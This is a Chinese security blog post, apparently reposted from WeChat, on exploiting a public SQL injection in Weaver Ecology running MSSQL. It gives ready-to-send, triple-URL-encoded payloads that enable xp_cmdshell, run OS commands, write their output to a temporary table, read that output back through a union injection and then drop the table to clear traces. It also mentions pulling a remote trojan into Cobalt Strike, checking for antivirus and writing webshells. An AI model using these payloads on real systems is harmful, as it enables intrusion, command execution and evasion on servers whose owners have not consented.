泛微Ecology Mssql注入后利用

admin
admin
admin
102855
文章
87
评论
2023年8月3日09:58:59评论65 views字数 7083阅读23分36秒阅读模式

0x00 前言

三月份,网上公开了个某微SQL注入漏洞,网上师傅们已经详细分析过该漏洞。

本篇文章主要记录漏洞复现过程中,关于一些已验证的漏洞后利用方式。



0x01 漏洞验证

利用网上的POC验证是否存在漏洞,顺带判断下数据库版本。

泛微Ecology Mssql注入后利用



注入语句需要进行三次URL编码,以绕过关键字过滤。

a' union select 1,''+(SELECT @@VERSION)+'

泛微Ecology Mssql注入后利用



漏洞原作者在博客中提到了这样一个细节,根据这个细节做了一些测试。

泛微Ecology Mssql注入后利用



0x02 出网利用

执行ping命令测试

泛微Ecology Mssql注入后利用


泛微Ecology Mssql注入后利用


还是熟悉的那些语句,只是测试时有一些小坑,都踩过了。

POC如下(未编码前):

keyword='EXEC sp_configure 'show advanced options',1 select'keyword='RECONFIGURE select'keyword='EXEC sp_configure 'xp_cmdshell',1 select'keyword='RECONFIGURE select'keyword='exec master..xp_cmdshell 'ping dnslog.cn' select'

出网的话,直接远程下载马,然后执行上到CS,点就有喽。



0x03 不出网利用(结果回显)

1、创建一个临时表 temp_abc , 未编码前的注入语句如下:

keyword=x'CREATE TABLE ecology.dbo.temp_abcd(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100)) select'


泛微Ecology Mssql注入后利用

不涉及特殊字符的部分可以不进行URL编码

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%34%25%33%32%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%30%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%36%32%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%33%34%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%39%25%32%35%25%33%35%25%33%34%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%38%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%32%25%32%35%25%33%33%25%33%31%25%32%35%25%33%33%25%33%30%25%32%35%25%33%33%25%33%30%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37


2、执行命令,并将执行结果内容写入临时表中

keyword=x'INSERT INTO ecology.dbo.temp_abcd(data) EXEC master..xp_cmdshell 'chdir' select'


泛微Ecology Mssql注入后利用


isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%36%36%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%38%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%36%35%25%32%35%25%33%32%25%36%35%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%30%25%32%35%25%33%35%25%36%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%32%25%33%37whoami%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37



3、从临时表中查询出命令执行的结果

当你多次执行命令时,新的命令执行结果会新增到临时表中,此时需要改变id以获取最新的结果(id=2、id=3...)

keyword=x'UNION SELECT 1,(select data from ecology.dbo.temp_abcd where id=1)+'


泛微Ecology Mssql注入后利用 


isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%35%25%33%35%25%32%35%25%33%34%25%36%35%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30id=1%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37



4、清理痕迹,删除临时表

keyword=x'DROP TABLE ecology.dbo.temp_abcd select'


泛微Ecology Mssql注入后利用


isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%35%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%34%25%33%32%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37



构造的实际执行的SQL语句与原SQL语句对比

select t1.id as id,t1.name as name from ecology.dbo.meeting_remind_type t1 where isuse=1 and t1.name like '%keyword%'
select t1.id as id,t1.name as name from ecology.dbo.meeting_remind_type t1 where isuse=1 and t1.name like '%keyword'union select 1,(select data from ecology.dbo.temp_abcd where id=1)+'%'

泛微Ecology Mssql注入后利用



0x04 总结

  1. 在实际项目中,注意先搞清楚杀软情况,再决定下一步操作。

  2. 不出网时,如果需要写一个webshell,注意先判断是否站库分离。

  3. 当执行命令的结果为多行内容时,需要去遍历 id 以获取完整的命令执行结果。

  4. 结果内容较多,可以使用Burp的Intruder模块辅助遍历。

  5. 在测试过程中发现,删除临时表后仍能访问到缓存数据(无影响,但请留意别入坑)。



0x05 参考文章

http://www.lvyyevd.cn/archives/mou-wei-sql-zhu-ru-fen-xi

https://mp.weixin.qq.com/s/17tc4ep83x4243lzr-brCg




: , , .



原文始发于微信公众号(小黑说安全):泛微Ecology Mssql注入后利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月3日09:58:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微Ecology Mssql注入后利用https://cn-sec.com/archives/1930547.html

发表评论

匿名网友 填写信息